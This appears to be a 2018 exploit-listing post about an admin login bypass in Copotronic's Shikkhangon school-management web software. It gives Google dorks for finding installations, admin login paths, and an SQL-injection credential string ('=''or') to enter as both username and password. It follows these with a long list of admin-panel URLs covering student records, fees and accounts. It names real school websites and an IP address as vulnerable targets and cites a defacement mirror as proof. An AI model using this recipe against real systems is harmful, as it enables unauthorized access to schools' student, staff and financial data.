Software Developed By Copotronic Shikkhangon Iqbal Hossain Rimon Admin Login Bypass Vulnerability

2018.07.07

KingSkrupellos (GB)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-592

#################################################################################################

# Exploit Title : Software Developed By Copotronic Shikkhangon Iqbal Hossain Rimon Admin Login Bypass Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 06/07/2018
# Vendor Homepages : copotronic.com ~ shikkhangon.com
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-592  [ Authentication Bypass Issues ]

#################################################################################################

# Another Exploit Title : Software IT Development By Copotronic InfoSystems Limited 
Shikkhangon CiMS Web Design Md. Iqbal Hossain Rimon Admin Login Bypass Vulnerability

# Description of the Software : Design & Develop By Copotyronic InfoSystem Ltd

Copotronic InfoSystems Ltd. is a Private-Govt. joint venture software company. With a mission to build digital Bangladesh People’s 
Republic of Bangladesh has taken initiative to promote in IT companies to enable extensive automation services and supports to 
Govt. organizations of Bangladesh to be Digital.COPOTRONIC is a dynamic organization engaged in promoting
software products, services,consultancy, Training using latest technologies to wide spectrum of corporations for over one decade. 
The quality & technology of the products reflect COPOTRONIC’s ability to produce & deliver world-class software solutions

#################################################################################################

# Google Dorks  : 

intext:''Copyright © 2018 Shikkhangon.com. All Right Reserved.''

intext:''© Copotronic InfoSystems Limited. All Right Reserved.''

inurl:''/about_college/'' site:edu.bd Copotronic

# Admin Control Panel Path =>  

/admin
/login

# Exploit : 

Username : '=''or'

Password : '=''or'

# Useable Administration Control Panel URL Links => 

/web/principal_message
/web/notice
/web/notice_list
/web/form_add
/web/form_list
/web/information_list
/web/slide
/web/about
/web/picture_gallery
/web/catagory_list
/admin/teacher_registration
/admin/teacher_list
/academic/class_teacher_assign
/admin/teacher_salary_structure
/admin/staff_registration
/admin/staff_list
/admin/student_registration
/admin/student_list
/admin/class_wise_student_list
/admin/section_wise_student_list
/admin/student_subject_assign
/admin/student_subject_view
/fees/fees_cat
/fees/class_wise_fees_management
/fees/student_fees_generate
/web/slide#
/academic/set_ca_marks
/academic/create_tabulation_sheet
/academic/marit_list
/academic/marit_list_class
/academic/mark_sheet
/academic/transcript
/academic/tabulation_sheet
/academic/tabulation_sheet_subject_wise
/academic/result_view
/accounts/master_head_create
/accounts/master_head_list
/accounts/sub1_head_create
/accounts/sub1_head_list
/accounts/sub2_head_create
/accounts/sub2_head_list
/accounts/sub3_head_create
/accounts/sub3_head_list
/accounts/navigation_head_view
/accounts/debit_voucher_entry
/accounts/debit_voucher_list
/accounts/credit_voucher_entry
/accounts/credit_voucher_list
/web/book_category_list
/web/book_list
/admin/student_sms_notice
/admin/attendance
/academic/show_class_routine
/academic/show_exam_routine
/admin/institute_information
/admin/class_list
/web/class_assign
/academic/set_class_timing
/academic/class_routine
/admin/section_list
/admin/section_assign
/admin/session_list
/admin/shift_list
/admin/subject_list
/admin/subject_assign
/academic/gpa_system
/academic/mark_distribution_system
/academic/term_subject_list
/academic/subject_wise_total_marks_list
/academic/set_exam_time
/academic/set_admit_card_initial
/academic/term_list
/admin/chartof_accounts
/admin/weekly_holiday
/admin/shift_assign

Uploaded Image Path from Admin Panel => /template/upload/principal_image/1_principal_image[RANDOMNUMBER].png  .jpg  .jpeg .gif

#################################################################################################

# Example Sites and Target Vulnerable IP Address 144.217.239.135 => 

gachuaadarshahs.edu.bd/login  => [ Proof of Concept for the Vulnerability ] => zone-h.org/mirror/id/31443090 ~ archive.is/xfYrE

dbmrhs.edu.bd/login  => [ Proof of Concept for the Vulnerability ] =>  archive.is/JhaLN

Vendor Homepage Admin Panel Path => copotronic.com/ims/shikkhangon/shikkhangon_admin/

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#################################################################################################

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Software Developed By Copotronic Shikkhangon Iqbal Hossain Rimon Admin Login Bypass Vulnerability

Dork: intext:''© Copotronic InfoSystems Limited. All Right Reserved.'' - intext:''Copyright © 2018 Shikkhangon.com. All Right Reserved.''

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.